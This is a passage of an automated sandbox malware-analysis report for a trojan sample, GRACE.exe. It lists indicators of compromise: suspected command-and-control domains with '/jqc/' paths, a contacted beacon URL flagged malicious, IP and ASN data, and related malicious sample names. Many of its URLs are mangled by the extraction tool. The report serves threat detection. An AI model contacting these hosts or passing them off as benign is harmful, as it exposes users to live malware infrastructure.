          http://ns.adb0%Avira URL Cloudsafe
          http://www.kimberlygoedhart.netReferer:0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.11sxsx.comReferer:0%Avira URL Cloudsafe
          http://www.kornteengoods.com/jqc/www.ludisenofloral.com0%Avira URL Cloudsafe
          http://www.hongreng.xyz0%Avira URL Cloudsafe
          http://www.kimberlygoedhart.net/jqc/www.fitdramas.com0%Avira URL Cloudsafe
          http://www.hotvidzhub.downloadReferer:0%Avira URL Cloudsafe
          http://ns.adobe.cobj0%URL Reputationsafe
          http://ns.adobe.cobj0%URL Reputationsafe
          http://ns.adobe.cobj0%URL Reputationsafe
          http://www.sterlworldshop.com/jqc/0%Avira URL Cloudsafe
          http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
          http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
          http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
          http://www.dl888.net/jqc/0%Avira URL Cloudsafe
          http://www.hotvidzhub.download/jqc/www.kornteengoods.com0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sterlworldshop.com0%Avira URL Cloudsafe
          http://www.registeredagentfirm.com/jqc/0%Avira URL Cloudsafe
          http://www.wlw-hnlt.com/jqc/0%Avira URL Cloudsafe
          http://www.11sxsx.com0%Avira URL Cloudsafe
          http://www.luxusgrotte.com/jqc/0%Avira URL Cloudsafe
          http://www.internetmarkaching.com0%Avira URL Cloudsafe
          http://www.fitdramas.com0%Avira URL Cloudsafe
          http://www.11sxsx.com/jqc/www.luxusgrotte.com0%Avira URL Cloudsafe
          http://www.novergi.com/jqc/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.registeredagentfirm.com/jqc/www.wlw-hnlt.com0%Avira URL Cloudsafe
          http://www.wlw-hnlt.com0%Avira URL Cloudsafe
          http://www.wlw-hnlt.com/jqc/www.novergi.com0%Avira URL Cloudsafe
          http://www.szyulics.comReferer:0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.ludisenofloral.comReferer:0%Avira URL Cloudsafe
          http://www.registeredagentfirm.comReferer:0%Avira URL Cloudsafe
          http://www.internetmarkaching.com/jqc/0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.novergi.com/jqc/www.quintred.com0%Avira URL Cloudsafe
          http://www.kimberlygoedhart.net0%Avira URL Cloudsafe
          http://www.novergi.comReferer:0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.fitdramas.comReferer:0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.luxusgrotte.com
          		217.160.0.171
          		truefalseunknown
          gfw.cloud301.net
          		141.164.47.167
          		truefalse
            		unknown
            www.dl888.net
            		216.250.110.35
            		truetrueunknown
            shops.myshopify.com
            		23.227.38.74
            		truefalseunknown
            www.internetmarkaching.com
            		104.21.69.246
            		truefalseunknown
            www.hongreng.xyz
            		unknown
            		unknowntrue
              		unknown
              www.ludisenofloral.com
              		unknown
              		unknowntrue
                		unknown
                www.11sxsx.com
                		unknown
                		unknowntrue
                  		unknown
                  www.sterlworldshop.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.kornteengoods.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.hotvidzhub.download
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.dl888.net/jqc/?njq0dR=RzuPnv&JfE=fDutAcwv9Lxx6pK+U/h8/Jmgh7jy3dQeKhNoyB3Bjj0bKWR6mwge2sLPOJXFU1/1riqctrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.quintred.com/jqc/www.kimberlygoedhart.netexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.dl888.net/jqc/www.hongreng.xyzexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.kornteengoods.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.11sxsx.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.ludisenofloral.com/jqc/www.11sxsx.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.quintred.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.kimberlygoedhart.net/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.hongreng.xyz/jqc/www.hotvidzhub.downloadexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.sterlworldshop.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.com/designersexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                          		high
                          http://ns.adobe.c/gGRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp, GRACE.exe, 00000000.00000003.215101178.0000000008601000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.novergi.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.sajatypeworks.comexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.szyulics.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.internetmarkaching.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ocsp.pki.goog/gts1o1core0GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.hongreng.xyz/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.luxusgrotte.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.pki.goog/GTS1O1core.crl0GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.ludisenofloral.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://ns.adbGRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.kimberlygoedhart.netReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.urwpp.deDPleaseexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.zhongyicts.com.cnexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.11sxsx.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameGRACE.exe, 00000000.00000002.293079053.0000000002841000.00000004.00000001.sdmpfalse
                            		high
                            http://www.kornteengoods.com/jqc/www.ludisenofloral.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.hongreng.xyzexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.kimberlygoedhart.net/jqc/www.fitdramas.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.hotvidzhub.downloadReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ns.adobe.cobjGRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp, GRACE.exe, 00000000.00000003.215101178.0000000008601000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.sterlworldshop.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://pki.goog/gsr2/GTS1O1.crt0GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.dl888.net/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.hotvidzhub.download/jqc/www.kornteengoods.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.carterandcone.comlexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.sterlworldshop.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.registeredagentfirm.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.wlw-hnlt.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.11sxsx.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                              		high
                              http://www.luxusgrotte.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.internetmarkaching.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fitdramas.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.11sxsx.com/jqc/www.luxusgrotte.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.novergi.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designersGexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/?explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bTheexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.registeredagentfirm.com/jqc/www.wlw-hnlt.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designers?explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.wlw-hnlt.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.wlw-hnlt.com/jqc/www.novergi.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.szyulics.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.tiro.comexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.goodfont.co.krexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.ludisenofloral.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schema.org/WebPageGRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.registeredagentfirm.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.internetmarkaching.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.typography.netDexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://fontfabrik.comexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.novergi.com/jqc/www.quintred.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.kimberlygoedhart.netexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.novergi.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fonts.comexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.sandoll.co.krexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fitdramas.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.sakkal.comexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.luxusgrotte.com/jqc/www.sterlworldshop.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.fontbureau.comexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.szyulics.com/jqc/Mexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.hotvidzhub.downloadexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.dl888.netReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.wlw-hnlt.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.dl888.netexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.sterlworldshop.com/jqc/www.internetmarkaching.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.registeredagentfirm.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.kornteengoods.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.quintred.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.hongreng.xyzReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.szyulics.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.founder.com.cn/cnexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fitdramas.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.internetmarkaching.com/jqc/www.registeredagentfirm.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.luxusgrotte.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fitdramas.com/jqc/www.szyulics.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.com/designers8explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.ludisenofloral.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.quintred.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.hotvidzhub.download/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.kornteengoods.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://ns.ado/1GRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp, GRACE.exe, 00000000.00000003.215101178.0000000008601000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                216.250.110.35
                                                		unknownHong Kong
                                                		134548DXTL-HKDXTLTseungKwanOServiceHKtrue

                                                General Information

                                                Joe Sandbox Version:31.0.0 Emerald
                                                Analysis ID:344817
                                                Start date:27.01.2021
                                                Start time:07:56:19
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 12m 45s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:GRACE.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:33
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@7/2@12/1
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 13.2% (good quality ratio 12.1%)
                                                • Quality average: 74.7%
                                                • Quality standard deviation: 30.2%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 104.43.193.48, 52.147.198.201, 172.217.23.36, 51.104.139.180, 92.122.144.200, 95.101.22.216, 95.101.22.224, 20.54.26.129, 67.27.158.126, 8.241.9.254, 8.248.139.254, 8.248.121.254, 8.241.122.126, 52.155.217.156
                                                • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, www.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                07:57:14API Interceptor216x Sleep call for process: GRACE.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                www.luxusgrotte.comordine.exeGet hashmaliciousBrowse
                                                • 217.160.0.171
                                                shops.myshopify.comv07PSzmSp9.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                win32.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                documents_0084568546754.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                Payment _Arabian Parts Co BSC#U00a9.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                MPbBCArHPF.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                G0ESHzsrvg.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                SecuriteInfo.com.Trojan.PackedNET.507.23078.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                SecuriteInfo.com.Trojan.PackedNET.507.15470.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                CQAOPIhHJZ.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203 _ 19-028-MP-010203.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                PO20210120.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                0iEsxw3D7A.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                z1k1U9Vnnw.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                PO_610.20-21.A2424.UP_PDF.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                RE.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                Shipping Docs_pdf.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                r.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                PO81053.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                January RFQ..exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                KuPBIsrqbO.exeGet hashmaliciousBrowse
                                                • 23.227.38.74

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                DXTL-HKDXTLTseungKwanOServiceHKWUHU95Apq3Get hashmaliciousBrowse
                                                • 156.235.189.154
                                                New Year Inquiry List.xlsxGet hashmaliciousBrowse
                                                • 156.237.162.40
                                                gPGTcEMoM1.exeGet hashmaliciousBrowse
                                                • 154.80.226.18
                                                CiL08gVVjl.exeGet hashmaliciousBrowse
                                                • 154.83.105.183
                                                MPbBCArHPF.exeGet hashmaliciousBrowse
                                                • 156.237.170.187
                                                G0ESHzsrvg.exeGet hashmaliciousBrowse
                                                • 45.199.38.93
                                                NEW AGREEMENT 2021.xlsxGet hashmaliciousBrowse
                                                • 154.80.226.18
                                                SecuriteInfo.com.Trojan.PackedNET.507.23078.exeGet hashmaliciousBrowse
                                                • 154.95.152.81
                                                SecuriteInfo.com.Trojan.PackedNET.507.15470.exeGet hashmaliciousBrowse
                                                • 154.80.196.189
                                                PO20210120.exeGet hashmaliciousBrowse
                                                • 154.219.198.4
